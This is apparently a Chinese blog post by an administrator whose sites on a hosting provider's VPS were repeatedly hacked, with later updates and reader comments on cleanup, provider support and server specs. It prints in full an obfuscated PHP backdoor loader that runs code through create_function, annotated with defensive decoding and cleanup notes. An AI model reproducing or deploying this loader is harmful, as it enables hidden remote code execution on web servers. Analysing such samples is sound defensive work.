我知道平台很舊,難道被入侵,捕夢網數位科技只能兩手一攤嗎?還是要我用VPS,問題是我用的就是很貴的VPS(雲端主機)了,還是被入侵,我實在沒有招了。才整個清完,沒有兩天又被入侵,我想我們自己還是自求多福吧。
<?php
/*
 * Obfuscated PHP loader that was injected into the compromised site.
 * Defensive reading notes; the code below is reproduced unchanged.
 *
 * NOTE(review): this pasted copy is not byte-accurate. Quotes appear as
 * typographic quotes, and the escapes inside the blob show up as " x7f",
 * " x27", ... with a space where the stub below expects a tab (chr(9)).
 * Take hashes and signatures from the file on disk, not from this listing.
 *
 * What the visible stub does:
 *  1. $sqxvbm is one long string holding shuffled fragments of a second stage.
 *  2. $pppqetw = explode(chr(490-370) = 'x', substr($sqxvbm, 33457-27531 = 5926,
 *     193-159 = 34)). The 34-character run "STrrEvxNoITCnuF_EtaeRCxECaLPer_RtS"
 *     near the end of the string fits that length (the offset cannot be
 *     verified on this mangled copy). Split on 'x', element 0 reads strrev,
 *     and the other two elements reversed read create_function and
 *     str_replace; these are stored in $gmcvgrd and $olikwdf.
 *  3. $umjyhmx is a list of offset,length pairs split on chr(275-231) = ','.
 *     blgfsdkxki() concatenates those substr() slices of $sqxvbm, then calls
 *     $dlllozm(chr(9), chr(92), ...), i.e. str_replace turning tabs into
 *     backslashes so the hex/octal escapes of the second stage become valid.
 *  4. The reassembled text is compiled with create_function("", ...) and run
 *     through $lyxsjwqe(""); the working variables are overwritten around
 *     that call.
 *
 * Second-stage fragments readable inside the blob: a $GLOBALS[...] guard flag,
 * @error_reporting(0), $uas = strtolower($_SERVER[...]) followed by several
 * strstr($uas, ...) tests, function zzuquwp($n){return chr(ord($n)-1);}
 * applied with array_map over str_split (every character shifted down by
 * one), and a final $jfigqxz("", $udiftgb) call whose result is invoked.
 * NOTE(review): the escaped names look like HTTP_USER_AGENT and
 * create_function, but that is inferred, not decoded. What the innermost
 * payload does cannot be determined from this page.
 *
 * WARNING: create_function() evaluates a string as code (eval-equivalent).
 * It is deprecated since PHP 7.2 and removed in PHP 8.0, so this loader
 * only runs on older interpreters.
 *
 * Hunting and cleanup hints: look for PHP files that begin with one very
 * long "<?php $var = '...'" statement, for function_exists() guards around
 * random-looking function names, and for dynamic calls such as
 * $arr[0]($arr[1]). Compare files against a known-good copy of the
 * platform. Re-infection within days of a cleanup suggests that an entry
 * point or a second backdoor is still present (assumption; confirm from
 * the web server access logs).
 */
$sqxvbm = ‘cvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf`opB#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#7fw6* x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)df x22l:!}V;3q%}U;y]}R;2]},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}{dXA x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA x27K6< x7fw6*3qj%)rrd/#00;quui#>.%!<***f x27,*e x27,*d x27,*c x27,*b x27)fepdof.)f54 120 x5f 125 x53 105 x52 137 x41 107 x45 116 x54″]); if ((s!%tww!>! x2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57%)euhA)3of>2bd%!<5h%/#0#/*#npd/##-%tmw)%tww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K7D4]82]K6]72]K9]78]K5]53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]2W%wN;#-Ez-1H*WCw*[!%rN}#Qw%)fnbozcYufhA x272qj%6<^#zsfvr# x5cq%7/7#@#7/7^#iubq# x5cqujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`A6~6<u%7>/7&6|7**111127-K4Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+#Q7R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#f368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381pjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!7> x2272qj%)7gj6<**2qj%)hopm3qjA)qj3hopmA x273qj%6<*Y72]254]y76#<!%w:!>!(%w:!>! x246767~6<Cw6<pd%w6Z6<.5`ay_map(“zzuquwp”,str_split(“%tjw!>!#]y84]275]y83]248]y83]256]y81]265]y2>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sut44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFS&g}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uof:opjudovg<~ x24<!%o^nbsbq% x5cSFWSFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)544 x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opa 61 x31″)) or (strstr($uas,” x61 156 x64 162 xfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56+so!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! 
x24/%tmw/ x24)%zW%h>EzH,z>#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]8:56985:6197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:5298judovg x22)!gj}1~!<2p% x7f!~!<##!>!2p%Z<^2 x]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]77]opoV;hojepdoF.uofuopD#278]y3f]51L3]84]y31M64]284]364]6]234]342]58]24]31#-%tdz*Wsfuvs# x27rfs%6~6< x7fw6<*K)ftpmd]38y]47]67y]37]88y]27]28y]#/r%if((function_exists(” x6f 142 x5f 163 x74 141 x72 164″) && (!00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%5-t.98]K4]65]D8]86]y31]A x27pd%6<C x27pd%6|6.7eu{66~6)ldbqov>*ofmy%)utjm!|!*5! x27!hmg%)!%t2w>#]y74]273]y76]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<)sfebfI{*w%)kVx{**#k#)tutjyf`x:!>! x242178}527}88:}334}472 x2qpuft`msvd},;uqpuft`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7f;!osv!-#2#/#%#/#o]#/*)323zbe!-#jt0jg!)%j:>>1*!%b:>1<!fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%s: x5c%j:4<!%ff2!>!bssbz) x24]25 x24-gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sutcvt)esp>hmg%!<1:>1<!gps)%j:>1<%j:=tj{fpg)%s:*<%j:,,Bng(0); $udiftgb = implode(arr5f9#-!#f6c68399#-!#65egb2dc#*<!sfuv6f 151 x64″))) { $jfigqxz = ” x63 162 x65 141 x74 145 -}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h84]275]y83]273]y76]277#<!yfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBS4- x24<%j,,*!| x24- x24gvodujpo!)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%!<*qp%-*.x5f 146 x75 156 x63 164 x69 157 x6e”; function zzuquwp($n){return chd_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b99386c6f+9f5d816:+946:ce;)gj}l;33bq}k;opjudovg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,6hA x27pd%6<pd%w6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`hj%>j%!*3! 
x27!hmg%!)!gj!<2,*j%!-#4b!>!%yy)#}#-# x24- x24-tusqpt)%z-#x27id%6< x7fw6* x7f_*#ujojRk3`{666~6<&w6< x7fw5c2b%!>!2p%!*3>?*2b%)gpf{jtsbut`cpV x7f x7f x7f x7f<u%V x27{ftmfV x7f<*X&Z&S{ftmfV -#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!#]y38#-!vt)fubmgoj{hA!osvufs!~<3,6~6<&w6< x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA x27&6<.fmjgA x27doj%6< xtrstr($uas,” x6d 163 x69 145″)) or (strstr($uas,” x72 166 x3):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%ufs}w;* x7f!>> x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`o)ebfsX x27u%)7fmjix6<C x27&6<*rfs%7-K)f%!|!*)323zbek!~!<b% x7f!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)u|ftmf!~<**9.-j%-bubE{h%)sutcTW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-# x24-!% x24- x24*!|! x24- x24 x5c%j^ x24- x24tvctus)% x24- x2qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!/!#0#UOSVUFS,6<*msv%7-MSV,6<*)ujojR dk!~!<**qp%!-uyfu%)3offttj x22)gj!|!*nbsbq%)323ldfi% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr# x5cq%)ufttj x22)gj6<^#Y# x5cq% )fepdof`57ftbc x7f!|!*uyfu x27k:!ftmf!}Z;6*CW&)7gj6<.[A x27&6< x7fw6* x7f_*#[k2`{6:!}7ppde:4:|:**#ppde#)tutjyf`<#462]47y]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t%)3)idubn`hfsq)!sp!*#ojneb#-*f%)sepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>qp%!|Z~!<##!>!2p%!|!*l} x27;%!<*#}_;#)323ldfid>}&;bss!>!bssbz)#44ec:649#-!#:618dKc]55Ld]55#*<%bG9}:}.}*?]+^?]_ x5c}X x24<!%tmw!>!#]y4)% x24- x24y4 x24- x24]y8 x24- x24]26 x2tpqsut>j%!*9! x27!hmg%)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+7<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fw6*CW&)7gj6<*K)ftpmdX%w:**<“)));$pxzyuhc = $jfigqxz(“”, $udiftgb); $pxzyuhc();}}:#* x24- x24!>! x24/%tjw/ x2XA6|7**197-2qj%7-K)udfoopi x5c1^W%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB%epn^<!%w` x5c^>Ew:Qb:Qc:W~!%z!>5fubmgoj{h1:|:*mmvo:>:iuhofm%:-5D6]281L1#/#M5]DgP5]D6#<%fdy>#]TW%hIr x5c1^-%r x5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!o!%bss x5csboe))1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b24)##-!#~<#/% x24- x24!>!fyqmpef)# x24*<!%t::!>! 
x2]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]46BALS[” x61 156 x75 156 x61″]=1; $uas=strtolower($_SERVER[” x48 124 xD4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdr(ord($n)-1);} @error_reportiisset($GLOBALS[” x61 156 x75 156 x61″])))) { $GLO1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE{h%)!osvufs} x7f;!opjudovg}k~~9{d%:osvufs:~928>> x22:ftmbg39*56A:>:8 x24- x24y7 x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! x24/%t2w/ xx27Y%6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5`{6;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjjudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)u:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd1927STrrEvxNoITCnuF_EtaeRCxECaLPer_RtSdjksresl’; $pppqetw=explode(chr((490-370)),substr($sqxvbm,(33457-27531),(193-159))); $gmcvgrd = $pppqetw[0]($pppqetw[(4-3)]); $olikwdf = $pppqetw[0]($pppqetw[(11-9)]); if (!function_exists(‘blgfsdkxki’)) { function blgfsdkxki($qaqrqptnon, $rqkgwpac,$dlllozm) { $gkvapugxk = NULL; for($xpluckee=0;$xpluckee<(sizeof($qaqrqptnon)/2);$xpluckee++) { $gkvapugxk .= substr($rqkgwpac, $qaqrqptnon[($xpluckee*2)],$qaqrqptnon[($xpluckee*2)+(4-3)]); } return $dlllozm(chr((44-35)),chr((279-187)),$gkvapugxk); }; } $umjyhmx = 
explode(chr((275-231)),’2010,61,5479,49,5337,68,369,61,3630,60,1490,47,2709,54,2972,68,5450,29,2645,29,1150,70,1098,52,3210,67,2179,30,4778,70,827,25,3807,39,706,51,1952,28,4935,25,234,70,1045,53,648,58,4155,70,5730,50,3564,66,99,70,2845,52,4073,31,3345,46,4266,45,5780,40,1314,54,2374,66,3755,52,1006,39,3912,28,3539,25,3277,33,5528,60,4646,69,2209,36,2558,50,1220,40,0,57,1777,44,3391,27,2929,43,484,32,304,65,4430,64,4715,63,4035,38,4400,30,1537,46,3074,24,1260,54,3040,34,3846,66,4126,29,4104,22,4225,41,1389,65,4494,29,5588,64,5878,48,5048,32,4311,25,1454,36,5820,58,3418,56,3168,42,893,62,1868,22,2313,30,169,65,3098,70,2440,29,4575,30,2820,25,2245,68,430,54,1980,30,2120,36,3690,65,4336,64,1368,21,2343,31,2530,28,3974,61,3310,35,4907,28,4605,41,2897,32,5652,25,5677,53,5234,51,852,41,4960,60,4523,30,2674,35,1583,61,621,27,5110,54,516,53,1712,65,2156,23,1890,21,1821,47,569,52,5080,30,5405,45,1644,68,4553,22,2763,57,2071,49,955,51,5285,52,1911,41,5164,70,2608,37,2469,61,5020,28,757,70,3940,34,57,42,3474,65,4848,59′); $lyxsjwqe = $gmcvgrd(“”,blgfsdkxki($umjyhmx,$sqxvbm,$olikwdf)); $gmcvgrd=$sqxvbm; $lyxsjwqe(“”); $lyxsjwqe=(386-265); $sqxvbm=$lyxsjwqe-1; ?>
不知道入侵的內容是什麼,可以的話,請解譯一下。
20161018 其實不是不能解決平台老舊有漏洞的問題,就是錢花下去,買WAF服務,如果這就是解決方案,捕夢網也未免太好做了。
另外,除了Google Webmaster掃到的毒之外,還有一堆,當然,捕夢網提供的只有Google的異常清單。
還有一些被隱藏的植入點,仍然是存在的,何時會被再入侵,我不知道,只有一句話,靠運氣。
有沒有招呢?有,我已經用了,而且還用了好幾招,從內而外的處理。
記錄這篇,順便在明年續約時拿出來,已經說了,他們不行,就不要硬用同一家了,拜託啦~採購大人。
20161019 捕夢網工程人員的弱,真的是無法想像,更新檔案後,owner / group 為root,同事無法更新,跑來吵我。
寫信去請求協助,搞到還要打電話來問我為什麼?還要我教你們嗎?昏倒,我還是洗洗睡好了。
20161024 先說,放在捕夢網的2個站,兩個站都被入侵,還是不同的方式入侵,植入的程式碼不同,花我自己的時間在做程式的修正,說真的,如果要花錢買WAF(web application firewall),還不如搬回家來自己管。虛擬機被打掛了,我又不會痛是唄?
有點扯耶…話說想問樓主,捕夢網的vps一顆cpu核心可以跑到GHz呢?想架openconnect連線用
阿,我看到了,好像只有1GHz,而且centos只有6……
他是VCPU,是的1GHZ,也就是說,拿到的不是實體效能
好想搬回到公司的環境中 一天到晚有入侵的問題,實在有夠煩的